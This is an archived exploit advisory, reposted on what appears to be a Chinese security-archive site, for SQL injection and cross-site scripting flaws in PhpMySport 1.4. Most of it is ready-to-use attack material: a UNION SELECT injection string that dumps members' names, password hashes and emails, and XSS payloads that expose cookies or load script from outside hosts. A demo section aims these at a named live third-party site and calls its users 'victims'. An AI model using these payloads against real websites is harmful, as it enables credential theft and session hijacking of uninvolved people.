首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

PhpMySport 1.4 (XSS/SQL) Multiple Remote Vulnerabilities


(略)
#####################################################################
# PhpMySport v. 1.4 Multiple Remote Vulnerabilities (XSS\SQL) #
# ~ Discovered by XaDoS - xados [at] hotmail [dot] it ~ #
# ~ Th4nKs AlpHaNiX ~ #
#####################################################################

-Product site: http://phpmysport.sourceforge.net
-Version vuln: 1.4(latest) and maybe <

[ ] COD3:

The code vuln is at page /member_list.php (SQL)
and many others for (XSS) like
/index.php (v3/4/5/6)

[ ] EXPLoIt:


>>[$QL]<<

The bug is on the search_member page of this script
Yuo can write some bad sql code for see tha MD5 encrypted password ant name and other of the users..Example:

http://www.example.com/index.php?r=membre&v1=member_list

write in a search_member form:

-999'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat(member_firstname,0x3a,member_pass,0x3a,member_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/**/from/**/pms_member#

Now yuo can see the name, password and e-mail of users in the order:

name:password:email

Yuo can also see other informations like description, date of connection,country_id, sex, level_id, lastname, date of birth etc..

(this form is vuln to XSS.. try to inject javaScript ;-))



>>[XSS]<<

There are some pages vuln..
for example

http://www.example.com/index.php?r=co ... mp;v4=&v5=all&v6=[XSS]

[XSS] = "><script>alert(document.cookie)</script>
or
"><script src="http://www.badsite.com/page.js"></script>


########::D&m0::########

[SQL]:

http://olmobasket.altervista.org/phpm ... membro&v1=member_list

Write in the search_member form the right query:

-999'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat(member_firstname,0x3a,member_pass,0x3a,member_email),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/**/from/**/pms_member#

Yuo will see the name:password:email of victims

[XSS]:

http://phpmysport.sourceforge.net/dem ... t;><script>alert(document.cookie)</script><script src=http://www.securitycode.it/x.js></script>

#############
/.end

"They danced down the streets like dingledodies, and I shambled after as I've been doing all my life after people who interest me, because the only people for me are the mad ones, the ones who are mad to live, mad to talk, mad to be saved, desirous of everything at the same time, the ones who never yawn or say a commonplace thing, but burn, burn, burn like fabulous yellow roman candles exploding like spiders across the stars and in the middle you see the blue centerlight pop and everybody goes "OHooooo!"

<3 Beat Generation (or Byte generation ;-))

[2009-03-12]
<< YAP 1.1.1 (index.php page) Local File Inclusion Vulnerability VLC 0.9.8a Web UI (input) Remote Denial of Service Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号